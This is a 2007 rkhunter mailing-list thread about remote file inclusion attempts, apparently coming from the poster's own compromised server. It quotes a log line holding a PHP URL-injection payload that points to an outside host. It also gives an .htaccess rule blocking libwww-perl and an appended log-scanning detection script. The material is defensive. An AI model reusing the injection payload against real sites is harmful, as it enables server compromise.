Hi! That much I understand. Problem is that it's not my apache-log. The IP which is showing up in the log is my server (the one making the requests). So what is causing it? Can't find any rootkits with rkhunter..
Cheers!
/J

On 3 dec 2007, at 13.33, Helmut Hullen wrote:

> Hello, Johan,
>
> You (johan.sundstrom) wrote on 03.12.07:
>
>> IP Address of attacker: xxx.yyy.zzz.zzz
>
>> Type of attack: URL Injection -- attempt to inject / load files onto
>> the server via PHP/CGI vulnerabilities
>
>> Sample log report including date and time stamp:
>
>> Request: onlinesurfnshop.com xxx.yyy.zzz.zzz - - [01/Dec/2007:16:59:21 -0800] "GET /logos/banners//index.php?skin_file=http://www.n0n-clan.net//vwar/convert/test.txt? HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-"
>
> I stop these nasty scripts with an entry in the ".htaccess" file in the
> apache "DocumentRoot":
>
>     BrowserMatchNoCase "^libwww-perl" botnet
>
>     order allow,deny
>     allow from all
>     deny from env=botnet
>
> You can choose another name than "botnet", you can add other definitions
> for this self defined environment variable(s). The "order/allow/deny"
> block first allows "all" and then blocks all defined requests.
>
> Without this entry the tries result in error level 404 (or 500) in
> "error_log". With this entry they produce error level 403.
>
> I have tried this entry on a website with about 2000 visits a day; over
> a month there was no "good" try with the Browser "libwww-perl". Only
> nasty scripts.
>
> Best regards!
> Helmut
>
> -------------------------------------------------------------------------
> SF.Net email is sponsored by: The Future of Linux Business White Paper
> from Novell. From the desktop to the data center, Linux is going
> mainstream. Let it simplify your IT future.
> http://altfarm.mediaplex.com/ad/ck/8857-50307-18918-4
> _______________________________________________
> Rkhunter-users mailing list
> Rkhunter-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/rkhunter-users

--
Johan Sundström
Västerbottens museum
Box 3183
903 04 Umeå
Tel. 090 - 17 18 33
Mobile tel. 070 - 321 84 04
E-mail: [EMAIL PROTECTED]
www. http://www.vasterbottensmuseum.se
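The request pattern in the quoted report (a query parameter whose value is a remote URL, sent with a "libwww-perl" user agent) can be searched for in an access log. The following is an added example, not code from this thread or from rkhunter. The function name, the sample log lines and the hostnames in them are constructed for illustration, and the log layout is assumed to be Apache combined format with an optional leading virtual-host column as in the quoted line.

```python
import re
from urllib.parse import parse_qsl

# Combined log format, optionally preceded by a virtual-host column as in the
# quoted report. Fields after the user agent are ignored.
LOG_RE = re.compile(
    r'(?:(?P<vhost>\S+) )?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
REMOTE_URL = re.compile(r'(?:https?|ftp)://', re.I)   # value starts with a URL
SCRIPT_UA = re.compile(r'libwww-perl', re.I)          # same test as the .htaccess rule

# Constructed sample lines (documentation IP ranges, hypothetical hostnames).
SAMPLE_LOG = [
    'shop.example 192.0.2.10 - - [01/Dec/2007:16:59:21 -0800] "GET /logos/banners//index.php'
    '?skin_file=http://files.example//vwar/convert/test.txt? HTTP/1.1" 500 549 "-" '
    '"libwww-perl/5.805" - "-"',
    'shop.example 198.51.100.7 - - [01/Dec/2007:17:01:02 -0800] "GET /index.php?page=2 '
    'HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Dec/2007:17:05:40 -0800] "GET /view.php'
    '?inc=http%3A%2F%2Ffiles.example%2Fa.txt HTTP/1.1" 404 312 "-" "Mozilla/4.0"',
]

def find_remote_includes(lines):
    """Return one finding per request parameter whose decoded value is a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue  # not an access-log line in the assumed format
        _, _, query = m["target"].partition("?")
        # parse_qsl percent-decodes values, so http%3A%2F%2F... is caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                findings.append({
                    "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                    "param": name, "remote": value,
                    # False means the user-agent rule alone would not have matched.
                    "scripted_ua": bool(SCRIPT_UA.match(m["ua"])),
                })
    return findings

if __name__ == "__main__":
    for f in find_remote_includes(SAMPLE_LOG):
        print(f)
```

Legitimate redirect or callback parameters also carry URLs, so findings are leads to review, not verdicts.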